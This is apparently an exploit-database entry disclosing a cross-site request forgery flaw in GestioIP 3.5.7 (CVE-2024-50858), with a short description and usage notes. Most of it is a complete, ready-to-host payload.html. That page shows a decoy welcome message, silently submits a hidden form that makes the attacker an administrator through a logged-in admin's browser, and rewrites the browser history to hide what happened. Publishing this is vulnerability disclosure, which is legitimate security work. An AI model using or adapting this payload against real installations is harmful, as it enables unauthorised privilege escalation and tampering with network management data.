0f3d104e83
15 changes to exploits/shellcodes/ghdb ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF) GestioIP 3.5.7 - Cross-Site Scripting (XSS) GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS) GestioIP 3.5.7 - Remote Command Execution (RCE) GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS) OpenPanel 0.3.4 - Directory Traversal OpenPanel 0.3.4 - Incorrect Access Control OpenPanel 0.3.4 - OS Command Injection OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal Pimcore 11.4.2 - Stored cross site scripting Pimcore customer-data-framework 4.2.0 - SQL injection SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated) Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
76 lines
No EOL
2.5 KiB
Text
76 lines
No EOL
2.5 KiB
Text
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
|
|
# Exploit Author: m4xth0r (Maximiliano Belino)
|
|
# Author website: https://maxibelino.github.io/
|
|
# Author email : max.cybersecurity at belino.com
|
|
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
|
|
# Date: 2025-01-13
|
|
# Vendor Homepage: https://www.gestioip.net/
|
|
# Software Link: https://www.gestioip.net/en/download/
|
|
# Version: GestioIP v3.5.7
|
|
# Tested on: Kali Linux
|
|
# CVE: CVE-2024-50858
|
|
|
|
### Description
|
|
|
|
The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
|
|
|
|
### Prerequisites
|
|
|
|
The option "Manage - Manage GestioIP - User Management" must be enabled previously.
|
|
|
|
|
|
### Usage
|
|
|
|
To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
|
|
|
|
|
|
### File: payload.html
|
|
#### example: editing user named 'maxi'
|
|
|
|
|
|
<!DOCTYPE html>
|
|
<html lang="en">
|
|
<head>
|
|
<meta charset="UTF-8">
|
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
|
<title>Welcome to our site</title>
|
|
<style>
|
|
body {
|
|
font-family: Arial, sans-serif;
|
|
text-align: center;
|
|
}
|
|
.container {
|
|
margin-top: 50px;
|
|
}
|
|
iframe {
|
|
display: none;
|
|
}
|
|
</style>
|
|
</head>
|
|
<body>
|
|
<div class="container">
|
|
<h1>Thank you for visiting our site!</h1>
|
|
<p>We are processing your request, please wait a moment...</p>
|
|
<img src="https://placehold.co/150?text=Processing" alt="Processing...">
|
|
</div>
|
|
<!-- hidden iframe -->
|
|
|
|
<iframe name="hiddenFrame"></iframe>
|
|
|
|
<!-- The form that makes the POST to GestioIP Server -->
|
|
<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
|
|
<input type="hidden" name="name" value="maxi">
|
|
<input type="hidden" name="group_id" value="1">
|
|
<input type="hidden" name="email" value="maxi@test.com">
|
|
<input type="hidden" name="phone" value="123">
|
|
<input type="hidden" name="comment" value="">
|
|
<input type="hidden" name="client_id" value="1">
|
|
<input type="hidden" name="id" value="2">
|
|
<input type="hidden" name="B2" value="">
|
|
</form>
|
|
<script>
|
|
history.pushState('', '', '/');
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html> |